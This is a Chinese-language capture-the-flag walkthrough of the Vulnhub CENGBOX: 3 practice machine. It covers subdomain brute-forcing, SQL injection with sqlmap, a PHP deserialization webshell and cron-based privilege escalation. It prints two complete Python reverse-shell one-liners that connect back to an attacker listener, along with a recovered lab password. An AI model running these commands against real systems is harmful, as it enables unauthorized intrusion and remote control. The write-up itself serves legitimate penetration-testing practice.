zoukankan      html  css  js  c++  java
  • Vulnhub实战靶场:CENGBOX: 3

    一、环境搭建

    1、官网下载连接:https://www.vulnhub.com/entry/cengbox-3,576/

    2、下载之后,使用Oracle VM VirtualBox导入靶场环境

    3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

     二、靶场攻略

    1、nmap -sP --min-hostgroup 1024 --min-parallelism 1024  10.10.114.0/24,获得靶场真实ip

     查看启动的服务,开启了80、443都是web服务,根据443端口服务的提示,跟这系列第二个靶场一样得改HOSTS文件来访问

     修改之后,访问成功

     2、在主站本身,找不到任何突破口,进行子域名爆破:gobuster vhost -k -u https://ceng-company.vm/ -w subdomains-top1million-5000.txt

     爆破出一个dev.ceng-company.vm的子站,重新修改hosts文件之后,访问是个登录页面

     3、登录框我一般都是直接尝试是否有SQL注入,使用BurpSuite抓包之后,利用SQLmap进行探测,确定存在注入,成功得到网站后台账号密码

     4、使用管理账号登录之后,发现后台有一个ADD POEM功能,提交发现See Here功能处,是将数据提交到网站根目录的

     

     5、考验反序列化漏洞利用的,那么就进行构造

    然后,装构造好的参数进行转码,需要转为URL编码之后提交

     访问主站http://ceng-company.vm/phpinfo.php,确定成功写入

     6、下一步就是写入shell.php来进行命令执行,进一步利用,构造命令执行的文件,一样转码之后提交,成功getshell

     7、命令执行,输入python3之后,出现python的调用,说明系统环境中有python3,下一步就是获得交互shell,使用python的反弹shell命令

     在kali里使用nc监听端口,然后在上传的webshell中执行命令:

    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.114.191",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")',成功反弹shell

     8、查看home目录,只有个eric用户

    pspy64查看发现定时执行/opt目录下的login.py

     

     查看权限,只有eric用户可读写

     因为是定时执行的任务,目标主机又安装有tcpdump所以可以使用tcpdump来抓取目标主机的流量,抓取3分钟左右

    将抓取的流量包移动到靶场的html目录中,kali里下载之后,使用strings命令查看,得到密码,注意%2A为*号,所以密码是3ricThompson*Covid19

     

     9、成功登录,得到user.txt的flag

     10、下一步就是提权,免密码执行的脚本有check.sh

     check.sh脚本执行的是whatsmyip.py文件

     11、使用echo命令修改login.py文件内容,

    echo "import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.114.191',2345));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')" > login.py
    <s.dup2(s.fileno(),2);pty.spawn('/bin/bash')" > login.py

     在kali中,监听好2345端口,等待计划执行,成功得到root权限,得到flag

     完

  • 相关阅读:
    MVC-07数据库
    Visual Web Developer 2012安裝教程
    开机启动项
    使用其他身份运行计算机(DOS命令)
    网络重置
    JavaWeb(七):EL表达式、自定义标签和JSTL
    JavaWeb(六):会话与状态管理
    JavaWeb(五):MVC案例
    JavaWeb(三):JSP
    JavaWeb(二):Servlet
  • 原文地址:https://www.cnblogs.com/sym945/p/14303728.html
Copyright © 2011-2022 走看看